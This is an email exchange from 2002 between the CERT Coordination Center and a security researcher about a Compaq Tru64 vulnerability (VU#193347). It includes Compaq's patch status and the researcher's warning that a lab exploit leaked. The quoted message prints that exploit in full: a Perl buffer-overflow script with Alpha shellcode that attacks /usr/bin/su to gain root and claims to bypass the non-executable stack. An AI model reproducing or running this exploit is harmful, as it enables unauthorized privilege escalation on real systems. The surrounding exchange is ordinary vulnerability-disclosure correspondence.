From: "CERT(R) Coordination Center" <cert@cert.org>
To: "KF" <dotslash@snosoft.com>
Cc: "CERT(R) Coordination Center" <cert@cert.org>; <simon@snosoft.com>
Sent: Friday, July 19, 2002 7:36 AM
Subject: Re: VU#193347



 -----BEGIN PGP SIGNED MESSAGE-----
 
 Hi, Kevin.
 
 Can I pass your words to Compaq?
 
 And, BTW, the latest from Compaq, as of a few minutes ago:
 
 "We have assigned case id SSRT2275 to cover the whole of these
 reports.  We are working all of them and will update you for releasing
 "early release patches" once we have solutions.  As you might well
 understand this is not a simple 1 or 2 component issue solutions to
 manage fixes for everything identified is a bit complex."
 
 Thanks,
 Ian
 
 Ian A. Finlay
 CERT (R) Coordination Center 
 Software Engineering Institute
 Carnegie Mellon University
 Pittsburgh, PA  USA  15213-3890
 
 
 Kf <dotslash@snosoft.com> writes:

 >Just so Compaq does not flip out and try to sue us... it has come to my 
 >attention that someone with access to our lab has leaked one of the 
 >exploits for TRU64. We employ people from the general public from all 
 >over the world for our development so we have not yet pinpointed how the 
 >code was "lifted" as many people have access to our lab. This issue was 
 >already passed on to the public in September of 2001 and an exploit was 
 >ALREADY published by k2 of ADM...so I don't see this as any big surprise 
 >short of the fact that ours will bypass the non-exec stack...just a 
 >heads up. http://packetstorm.linuxsecurity.com/0101-exploits/tru-64.su.c
 >is the code that was released last year...
 >This is the code that we created to exploit /bin/su... I believe this is 
 >what was leaked.
 >
 >
 >#!/usr/bin/perl -w
 >#
 ># xxxxx (xxxxx@snosoft.com) - 30/05/2002
 >#
 >
 >($offset) = @ARGV,$offset || ($offset = 0);
 >$ret_addr = pack("ll",(0x40010250+$offset),0x1);
 >
 >$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
 >$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
 >$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
 >$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
 >$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
 >$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
 >$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
 >$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
 >$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
 >$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
 >
 >$buf_a  = "A"x8233;
 >$buf_a .= $ret_addr;
 >
 >$buf_b  = pack("l",0x47ff041f)x3750;
 >$buf_b .= $sc;
 >
 >exec("/usr/bin/su",$buf_a,$buf_b,0);
 >
 >-KF

 - -- 
 Ian Finlay
 Internet Systems Security Analyst - CERT/CC Operations 
 Networked Systems Survivability Program
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 CERT (R) Coordination Center             Email: cert@cert.org
 Software Engineering Institute           WWW: http://www.cert.org
 Carnegie Mellon University               Hotline: +1-412-268-7090
 Pittsburgh, PA  USA  15213-3890          FAX: +1-412-268-6989
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 